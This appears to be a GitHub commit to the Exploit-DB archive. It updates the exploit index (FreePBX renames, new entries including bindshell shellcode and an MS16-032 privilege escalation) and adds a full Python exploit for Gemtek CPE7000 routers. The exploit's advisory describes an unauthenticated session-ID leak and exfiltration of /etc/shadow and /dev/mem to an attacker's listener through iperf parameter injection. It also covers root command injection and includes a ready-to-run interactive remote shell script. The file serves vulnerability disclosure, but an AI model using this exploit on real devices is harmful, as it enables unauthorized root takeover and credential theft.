Skip to content

Commit

Permalink
DB: 2016-04-22
Browse files Browse the repository at this point in the history 
5 new exploits

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability

FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution

FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution

FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities
FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities

FreePBX config.php Remote Code Execution
FreePBX - config.php Remote Code Execution
FreePBX 2.5.2 admin/config.php tech Parameter XSS
FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS
FreePBX 2.5.2 - admin/config.php tech Parameter XSS
FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities
Linux/x86_64 - bindshell (Port 5600) - 86 bytes
Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)
  • Loading branch information
Offensive Security committed Apr 22, 2016
1 parent bd5d486 commit 22a4c5d
Show file tree
Hide file tree
Showing 6 changed files with 1,774 additions and 7 deletions.
19 changes: 12 additions & 7 deletions files.csv
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2355,7 +2355,7 @@ id,file,description,date,author,platform,type,port
2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0
2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0
2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0
2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0
Expand Down Expand Up @@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port
15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
Expand Down Expand Up @@ -16169,7 +16169,7 @@ id,file,description,date,author,platform,type,port
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0
18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0
Expand Down Expand Up @@ -26981,7 +26981,7 @@ id,file,description,date,author,platform,type,port
29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0
29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0
29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0
Expand Down Expand Up @@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port
32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0
32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0
32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0
Expand Down Expand Up @@ -30153,8 +30153,8 @@ id,file,description,date,author,platform,type,port
33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
Expand Down Expand Up @@ -35931,3 +35931,8 @@ id,file,description,date,author,platform,type,port
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0
39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
227 changes: 227 additions & 0 deletions platforms/hardware/webapps/39716.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,227 @@
#!/usr/bin/python

'''
# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
# Date: 04/06/2016
# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Vendor Homepage: gemtek.com.tw
# Version: Firmware Version 01.01.02.082
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082
1) SID leak / auth bypass
The sysconfg cgi application leaks a valid "SID" (session id) when the
following unauthenticated request is made:
Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1
The response body has the form: <checkcode>,<sid>
Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ
The sid thus obtained can be used to "unlock" the cliend-side administration
interface and/or to directly issue request that are usually restricted to
administrative accounts.
POCs:
I) Unauthenticated remote reboot:
Request:
/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>
II) Web admin interface access. Add a new cookie with the following values:
userlevel=2
sid=<sid>
--------------------------------------------------------------------------------
2) Arbitrary file download - with root privileges - via iperf tool
One of the diagnostic tools available on the device can be used to read an
arbitrary file on the device. The sysconfg cgi application fails to sanitize
user input, allowing an attacker to hijack the command issued to the "iperf"
binary, a commonly-used network testing tool that can create TCP and UDP data
streams and measure the throughput of a network that is carrying them.
The client-side validation can be easily bypassed by changing the javascript
validation code, or by directly sending a forged request to the server.
The iperf tool is run with the -c switch, meaning that it is behaving as a
client that sends data to a server. By adding the -F parameter, iperf is forced
to read data from a file instead of generating random data to be sent during the
measurement.
This attack needs 2 step in order to take advantage of the vulnerability.
The first request sets up the command be to run, the second one (a.k.a. toggle)
actually runs the command (check the response body, 1 means running, 0 means stopped).
The following "SETUP" request can be used to set the correct parameters:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
FILE>
Parameters breakdown:
XXX.XXX.XXX.XXX = attacker ip
YYYY = attacker listening port
zz = time limit
Note: nc is enough to capture data, which may be sent with some additional
header and footer introduced by iperf's protocol
In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POCs:
I) download of /etc/shadow
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
3) Unauthenticated remote root command execution
The same vulnerability can be used to issue an arbitrary command on the device.
The command executed on the system to run the diagnostic tool is constructed
using the sprintf function and the following format string, with no additional
checks:
iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
It is therefore possible to insert another command by injecting it in the
"perf_measure_server_ip" parameter and commenting out the rest of the original
command.
To concatenate a command, the string in the first half before the injection
point ( iperf -c " ) must be correctly closed with quotes ( " ).
Then the new command can be added, preceded by a semicolon ( ; ).
Finally, the other part of the original command after the "injection point"
must be commented out ( # ).
iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POC (echo test > /www/test):
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
client_num=1
and toggle:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
Remediation:
Disable wan access to the management web interface until an updated firmware is released.
More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
'''

#Gemtek CPE7000 / WLTCS-106 remote root command execution
#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082

import httplib
import ssl
import urllib
import time
import sys
import getopt
import socket

ssl._create_default_https_context = ssl._create_unverified_context

host=''
port = 443

def check():
try:
conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1")
r1 = conn.getresponse()
if r1.status != 200:
return False
return True
except socket.error as msg:
print "Cannot connect";
sys.exit();


def sendcmd( cmd ):
resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
urlencoded = urllib.quote_plus(resource)
cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
res = makereq (cmdresource)
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
if(res!="1"):
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
time.sleep(1)
res = makereq ("/cmdoutput.txt")
print res


def makereq (resource):
conn = httplib.HTTPSConnection(host +":"+str(port))
conn.request("GET", resource)
r1 = conn.getresponse()
body = r1.read()
return body


if len(sys.argv) < 2:
print 'GemtekShell.py <host> [<port> (443)]'
exit()
elif len(sys.argv) > 2:
port = sys.argv[2]

host = sys.argv[1]

print 'Connecting to ', host, port

if not check() :
print "Host seems not vulnerable"
sys.exit()


while(1):
cmd = raw_input("gemtekCMD> ")
if cmd.strip() != "quit" :
sendcmd(cmd)
else :
sys.exit()




Loading

0 comments on commit 22a4c5d

Please sign in to comment.